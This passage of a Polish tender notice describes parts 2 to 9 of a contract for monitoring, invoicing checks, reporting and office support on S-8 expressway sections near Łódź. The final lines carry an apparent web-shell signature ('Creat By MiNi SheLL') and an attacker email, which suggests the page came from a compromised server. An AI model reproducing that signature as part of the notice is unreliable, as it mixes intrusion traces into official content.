<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II - Monitoring postępu rzeczowo- finansowego realizowanego kontraktu,
współpraca z nadzorem autorskim i inwestorskim oraz z inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi ekspresowej S-8 - odcinek 3 i 5. Siedziba Biura Kierownika Projektu Unijnego - Pabianice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie II - Monitoring postępu
rzeczowo- finansowego realizowanego kontraktu, współpraca z nadzorem autorskim i inwestorskim oraz z
inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie
korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi
ekspresowej S-8 - odcinek 3 i 5. Siedziba Biura Kierownika Projektu Unijnego - Pabianice...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III - Monitoring postępu rzeczowo- finansowego realizowanego kontraktu,
współpraca z nadzorem autorskim i inwestorskim oraz z inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi ekspresowej S-8 - odcinek 9. Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie III - Monitoring postępu
rzeczowo- finansowego realizowanego kontraktu, współpraca z nadzorem autorskim i inwestorskim oraz z
inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie
korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi
ekspresowej S-8 - odcinek 9. Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV - Monitoring postępu rzeczowo- finansowego realizowanego kontraktu,
współpraca z nadzorem autorskim i inwestorskim oraz z inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi ekspresowej S-8 - odcinek 9. Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie IV - Monitoring postępu
rzeczowo- finansowego realizowanego kontraktu, współpraca z nadzorem autorskim i inwestorskim oraz z
inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie
korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi
ekspresowej S-8 - odcinek 9. Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie V - Monitoring postępu finansowego realizowanego kontraktu, prowadzenie
sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i zgodności z warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8 - odcinek 1, 2 i 4. Siedziba Biura Kierownika Projektu Unijnego - Łódź.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie V - Monitoring postępu
finansowego realizowanego kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu,
prowadzenie korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych
robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i
zgodności z warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8 - odcinek
1, 2 i 4. Siedziba Biura Kierownika Projektu Unijnego - Łódź.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie VI- Monitoring postępu finansowego realizowanego kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i zgodności z warunkami kontraktu oraz z procedurami unijnymi
na budowie drogi ekspresowej S-8 - odcinek 3 i 5. Siedziba Biura Kierownika Projektu Unijnego - Pabianice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie VI- Monitoring postępu
finansowego realizowanego kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu,
prowadzenie korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych
robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i
zgodności z warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8 - odcinek 3
i 5. Siedziba Biura Kierownika Projektu Unijnego - Pabianice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie VII-Monitoring postępu finansowego realizowanego kontraktu, prowadzenie
sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem,rozliczanie pod wzgl. finansowym realizowanych robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i zgodności z warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8-odcinek 6, 7 i 8. Siedziba Biura Kierownika Projektu Unijnego-Rzgów-Starowa Góra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie VII - Monitoring postępu finansowego
realizowanego kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie
korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych robót,
sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i zgodności z
warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8 - odcinek 6, 7 i 8.
Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie VIII-Monitoring postępu finansowego realizowanego kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, rozliczanie pod wzgl. finansowym realizowanych robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i zgodności z warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8-odcinek 6,7 i 8. Siedziba Biura Kierownika Projektu Unijnego-Rzgów-Starowa Góra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie VIII - Monitoring postępu
finansowego realizowanego kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu,
prowadzenie korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych
robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i
zgodności z warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8 - odcinek
6, 7 i 8. Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie IX - Sporządzanie na komputerze wymaganej sprawozdawczości, zestawień i
korespondencji, umawianie, obsługa i protokołowanie narad i spotkań organizowanych przez Kierownika Projektu Unijnego, obsługa urządzeń biurowych (telefon, faks, ksero) na budowie drogi ekspresowej S-8 - odcinek 1, 2 i
4. Siedziba Biura Kierownika Projektu Unijnego - Łódź.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie IX - Sporządzanie na
komputerze wymaganej sprawozdawczości, zestawień i korespondencji, umawianie, obsługa i protokołowanie
narad i spotkań organizowanych przez Kierownika Projektu Unijnego, obsługa urządzeń biurowych (telefon,
faks, ksero) na budowie drogi ekspresowej S-8 - odcinek 1, 2 i 4. Siedziba Biura Kierownika Projektu
Unijnego - Łódź.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com